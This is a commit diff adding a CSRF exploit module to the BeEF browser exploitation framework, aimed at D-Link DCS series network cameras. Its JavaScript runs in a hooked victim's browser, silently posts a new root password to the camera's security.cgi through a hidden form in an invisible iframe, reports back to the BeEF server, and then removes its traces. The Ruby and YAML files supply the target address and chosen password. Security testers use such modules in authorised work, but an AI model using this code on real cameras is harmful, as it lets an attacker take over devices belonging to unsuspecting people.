Added dlink_dcs_series_csrf module

modules/exploits/camera/dlink_dcs_series_csrf/command.js

@@ -0,0 +1,51 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+  var base = '<%= @base %>'; 
+  var passwd = '<%= @password %>';
+
+  var dlink_dcs_iframe = beef.dom.createInvisibleIframe();
+
+  var form = document.createElement('form');
+  form.setAttribute('action', base + "/setup/security.cgi");
+  form.setAttribute('method', 'post');
+
+  var input = null;
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', 'rootpass');
+  input.setAttribute('value', passwd);
+  form.appendChild(input);
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', 'confirm');
+  input.setAttribute('value', passwd);
+  form.appendChild(input);
+
+  dlink_dcs_iframe.contentWindow.document.body.appendChild(form);
+  form.submit();
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(dlink_dcs_iframe);
+  }
+  setTimeout("cleanup()", 15000);
+
+});
+

modules/exploits/camera/dlink_dcs_series_csrf/config.yaml

@@ -0,0 +1,27 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+# More info: http://www.exploit-db.com/exploits/18509/
+#
+beef:
+    module:
+        Dlink_dcs_series_csrf:
+            enable: true
+            category: ["Exploits","Camera"]
+            name: "Dlink DCS series CSRF"
+            description: "Attempts to change the password on a Dlink DCS series camera."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]

modules/exploits/camera/dlink_dcs_series_csrf/module.rb

@@ -0,0 +1,29 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Dlink_dcs_series_csrf < BeEF::Core::Command
+  
+  def self.options
+    return [
+        {'name' => 'base', 'ui_label' => 'Camera web root', 'value' => 'http://192.168.0.1/'}, 
+        {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
+    ]
+  end
+  
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+  
+end